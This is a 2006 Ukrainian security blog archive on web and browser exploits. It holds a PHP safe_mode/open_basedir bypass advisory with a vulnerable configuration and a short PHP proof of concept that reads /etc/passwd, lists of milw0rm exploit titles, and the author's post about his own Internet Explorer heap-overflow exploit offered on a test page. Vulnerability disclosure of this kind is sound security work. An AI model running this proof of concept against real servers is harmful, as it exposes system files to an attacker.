Архів для категорії 'Експлоіти'

Обхід обмежень безпеки в PHP

21:15 28.09.2006

Можливий обхід обмежень безпеки в PHP.

Уразливі версії: PHP <= 4.4.4, PHP <= 5.1.6.

Уразливість дозволяє віддаленому користувачу одержати доступ до важливих даних в системі.

Уразливість існує через недостатнє обмеження на зміну параметрів safe_mode і open_basedir у функції ini_restore(). Якщо ці обмеження встановлені в настроюваннях віртуального хоста веб сервера, а у файлі php.ini знаходяться значення за замовчуванням, зловмисник може відновити значення за замовчуванням і обійти обмеження, встановлені у конфігураційному файлі web сервера.

Приклад уразливої конфігурації:
<Directory /usr/home/frajer/public_html/>
Options FollowSymLinks MultiViews Indexes
AllowOverride None
php_admin_flag safe_mode 1
php_admin_value open_basedir /usr/home/frajer/public_html/
</Directory>

Експлоіт:
<?
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include("/etc/passwd");
ini_restore("safe_mode");
ini_restore("open_basedir");
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include("/etc/passwd");
?>

Вдала експлуатація уразливості дозволить зловмиснику одержати доступ до вмісту довільних файлів даної системи.

Додаткова інформація:

  • Обхід захисту PHP Safe Mode (деталі)
  • Обход ограничений безопасности в PHP (деталі)

Добірка експлоітів

17:37 28.09.2006

В даній добірці експлоіти в веб додатках:

  • phpBB XS <= 0.58 (functions.php) Remote File Include Vulnerability (деталі)
  • phpBB <= 2.0.21 (Poison NULL Byte) Remote Exploit (деталі)
  • PhpLinkExchange 1.0 (include/xss) Remote Vulnerabilities (деталі)
  • WTools 0.0.1a (include_path) Remote File Include Vulnerability (деталі)
  • Exploits PhpLinkExchange v1.0 RC (деталі)

Добірка експлоітів

19:11 26.09.2006

Нова добірка експлоітів від milw0rm.

В даній добірці експлоіти в веб додатках:

  • MyABraCaDaWeb <= 1.0.3 (base) Remote File Include Vulnerabilities (деталі)
  • Open Bulletin Board <= 1.0.8 (root_path) File Include Vulnerability (деталі)
  • PUMA <= 1.0 RC 2 (config.php) Remote File Include Vulnerability (деталі)
  • Vivvo Article Manager <= 3.2 (classified_path) File Include Vulnerability (деталі)
  • mcGalleryPRO <= 2006 (path_to_folder) Remote Include Vulnerability (деталі)
  • Signkorn Guestbook <= 1.3 (dir_path) Remote File Include Vulnerability (деталі)
  • Vitrax Pre-modded <= 1.0.6-r3 Remote File Include Vulnerability (деталі)
  • webSPELL <= 4.01.01 Database Backup Download Vulnerability (деталі)
  • Popper <= v1.41-r2 (form) Remote File Include Vulnerability (деталі)
  • p4CMS <= 1.05 (abs_pfad) Remote File Include Vulnerability (деталі)

Кількість експоітів для веб додатків на milw0rm.com невпинно зростає.

Добірка експлоітів

20:33 25.09.2006

В даній добірці експлоіти в веб додатках:

  • WM-News <= 0.5 Multiple Remote File Include Vulnerabilities (деталі)
  • News Evolution 3.0.3 _NE[AbsPath] Remote File Include Vulnerabilities (деталі)
  • Vivvo Article Manager <= 3.2 (id) Remote SQL Injection Vulnerability (деталі)
  • Socketwiz Bookmarks <= 2.0 (root_dir) Remote File Include Exploit (деталі)
  • DokuWiki <= 2006-03-09b release /bin/dwpage.php remote commands execution xploit (деталі)

Експлоіти для Internet Explorer

15:15 25.09.2006

Нова добірка експлоітів для останніх помилок (уразливостей) в Internet Explorer. Попередню добірку дивіться в записі Експлоіти для Internet Explorer.

  • MS Internet Explorer (createTextRang) Download Shellcoded Exploit (2) (деталі)
  • MS Internet Explorer <= 6.0.2900 SP2 (CSS Attribute) Denial of Service (деталі)
  • MS Internet Explorer 6 Table.Frameset NULL Dereference Vulnerability (деталі)
  • MS Internet Explorer 6 (Internet.HHCtrl) Heap Overflow Vulnerability (деталі)
  • MS Internet Explorer 6 (Content-Type) Stack Overflow Crash (деталі)

Також рекомендую ознайомитися з моїм цікавим експлоітом для однієї з останніх уразливостей в IE - Переповнення буфера в Internet Explorer.

Добірка експлоітів

18:01 24.09.2006

В даній добірці експлоіти в веб додатках:

  • CCleague Pro <= 1.0.1RC1 (Cookie) Remote Code Execution Exploit (деталі)
  • Somery <= 0.4.6 (skin_dir) Remote File Include Vulnerability (деталі)
  • RaidenHTTPD 1.1.49 (SoftParserFileXml) Remote Code Execution Exploit (деталі)
  • PhotoKorn Gallery <= 1.52 (dir_path) Remote File Include Vulnerabilities (деталі)
  • PHPFusion <= 6.01.4 extract()/_SERVER[REMOTE_ADDR] sql injection exploit (деталі)

Добірка експлоітів

19:54 23.09.2006

В даній добірці експлоіти в веб додатках:

  • PhpNews 1.0 (Include) Remote File Include Vulnerabilities (деталі)
  • DokuWiki <= 2006-03-09b (dwpage.php) System Disclosure Exploit (деталі)
  • DokuWiki <= 2006-03-09b (dwpage.php) Remote Code Execution Exploit (деталі)
  • Multithreaded TFTP <= 1.1 (Long Get Request) Denial of Service Exploit (деталі)
  • Fantastic News “CONFIG[script_path]” File Inclusion Vulnerabilities (деталі)

Добірка експлоітів

18:10 22.09.2006

Десятка експлоітів до різних веб систем та веб додатків:

  • Sponge News <= 2.2 (sndir) Remote File Include Vulnerability (деталі)
  • C-News <= 1.0.1 (path) Remote File Inclusion Vulnerability (деталі)
  • ACGV News <= 0.9.1 (PathNews) Remote File Inclusion Vulnerability (деталі)
  • IBM Director < 5.10 (Redirect.bat) Directory Transversal Vulnerability (деталі)
  • Fire Soft Board <= RC 3 (racine) Remote File Include Vulnerability (деталі)
  • Web Server Creator v0.1 (l) Remote Include Vulnerability (деталі)
  • SL_Site <= 1.0 (spaw_root) Remote File Include Vulnerability (деталі)
  • PayProCart <= 1146078425 Multiple Remote File Include Vulnerabilities (деталі)
  • pHNews <= alpha 1 (templates_dir) Remote Code Execution Exploit (деталі)
  • PhpCommander <= 3.0 Remote Code Execution Exploit (деталі)

Добірка експлоітів

18:05 21.09.2006

В даній добірці експлоіти в веб додатках:

  • phpFullAnnu <= 5.1 (repmod) Remote File Include Vulnerability (деталі)
  • BinGo News <= 3.01 (bnrep) Remote File Include Vulnerability (деталі)
  • phpBB Shadow Premod <= 2.7.1 Remote File Include Vulnerability (деталі)
  • PhpCommander <= 3.0 Remote Code Execution Exploit (mq=off) (деталі)
  • Exploits Tr Forum V2.0 Admin MD5 Passwd Hash Disclosure (деталі)

Переповнення буфера в Internet Explorer

20:15 20.09.2006

Нещодавно була знайдена чергова уразливість в MS Internet Explorer - переповнення буфера в IE (Internet Explorer COM Object Heap Overflow).

Як повідомляє дослідник цієї уразливості, вона спрацьовує на Windows 2000 Server SP4 з Internet Explorer 6.0 SP1 та Windows XP SP2 з Internet Explorer 6.0 SP1.

Як я протестував на своїй Windows XP Pro SP2 + Internet Explorer 6.0 SP1 - уразливість працює. Причому помилка в IE серйозна, окрім DoS також можливе виконання довільного коду і навіть більше, можливе завантаження з віддаленого хоста та запуск довільної програми.

На основі інформації про дану уразливість, я розробив свій невеличкий, але досить цікавий експлоіт :-) .

Test Internet Explorer (тестувати потрібно лише в IE).

У експлоїта є деякі нюанси, що він може не кожного разу спрацювати - це особливість роботи прикладу коду наведеного автором, що експлоіт може заглючити і не спрацювати (на Windows XP SP2 з IE 6.0 SP1). Тому потрібно спробувати декілька разів, якщо у вас з першого разу не вийшло. Коли мій експлоіт вас похакає, ви про це дізнаєтесь :cool:

Можете ознайомитися з прикладом використання уразливості від автора:

  • Internet Explorer COM Object Heap Overflow Download Exec Exploit (деталі)